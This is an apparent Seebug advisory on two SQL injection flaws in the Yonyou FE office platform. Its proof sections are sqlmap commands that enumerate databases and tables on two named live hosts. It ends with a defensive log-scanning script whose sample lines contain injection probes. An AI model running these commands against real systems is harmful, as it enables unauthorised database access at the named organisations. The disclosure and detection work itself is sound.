Yonyou FE Office Platform: Generic SQL Injection (2 Issues)

2014-09-02T00:00:00
ID SSV:93338
Type seebug
Reporter Root
Modified 2014-09-02T00:00:00

Description

Brief description:

Generic SQL injection in the Yonyou FE office platform (2 issues).

Details:

SQL injection 1
Vulnerable file and parameter: /witapprovemanage/report/depReimburse.jsp?depid=1
Proof:
sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1"

<img src="https://images.seebug.org/upload/201409/0123020057c21f11c441862e0b5db876ef3b3f74.jpg" alt="1.jpg" width="600">

sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1" --dbs

<img src="https://images.seebug.org/upload/201409/01230211a7cddb3697d74d15d6572a04661b3f2e.jpg" alt="2.jpg" width="600">

SQL injection 2
Vulnerable path and parameter: /system/monitorright/monitor_right_add.jsp?id=1
Proof of exploitation:
sqlmap.py -u "http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1"

<img src="https://images.seebug.org/upload/201409/012303218fd447f936cc215639171581c5af151e.jpg" alt="1.jpg" width="600">

sqlmap.py -u "http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1" --tables -D fe_base5

<img src="https://images.seebug.org/upload/201409/01230332bd7da71cbe8cd1fea932a09f4b2c1703.jpg" alt="3.jpg" width="600">

5 cases were listed for the two paths above.

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201409/01230332bd7da71cbe8cd1fea932a09f4b2c1703.jpg" alt="3.jpg" width="600">
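
A defender-side check for the two endpoints in this advisory, added here as an example (it is not code from the original report or from Yonyou): it scans web access logs for requests to either path whose depid or id value is repeated or is not a plain integer. The combined log format, the sample lines and the assumption that legitimate values are decimal integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths and parameters named in this advisory (lower-cased for matching).
WATCHED = {
    "/witapprovemanage/report/depreimburse.jsp": "depid",
    "/system/monitorright/monitor_right_add.jsp": "id",
}
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate values are plain decimal integers (the advisory uses 1).
INTEGER = re.compile(r"\d{1,18}")

# Constructed sample lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Sep/2014:10:00:01 +0800] "GET /witapprovemanage/report/depReimburse.jsp?depid=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [02/Sep/2014:10:00:05 +0800] "GET /witapprovemanage/report/depReimburse.jsp?depid=1%20AND%205211%3D5211 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [02/Sep/2014:10:00:06 +0800] "GET /system/monitorright/monitor_right_add.jsp?id=1%27 HTTP/1.1" 500 812',
    '192.0.2.10 - - [02/Sep/2014:10:00:09 +0800] "GET /index.jsp?id=abc HTTP/1.1" 200 900',
]

def suspicious_requests(lines):
    """Return (client, path, param, values) for requests to a watched path
    whose parameter is repeated or is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # Decode the path, drop ;jsessionid-style suffixes, collapse slashes.
        path = re.sub(r"/+", "/", unquote(url.path).split(";")[0]).lower()
        param = WATCHED.get(path)
        if param is None:
            continue
        # parse_qs percent-decodes values, so encoded input is compared decoded.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        if len(values) > 1 or any(not INTEGER.fullmatch(v) for v in values):
            hits.append((client, path, param, tuple(values)))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so parameters sent in a POST body need the same check at a reverse proxy or WAF that can see the body.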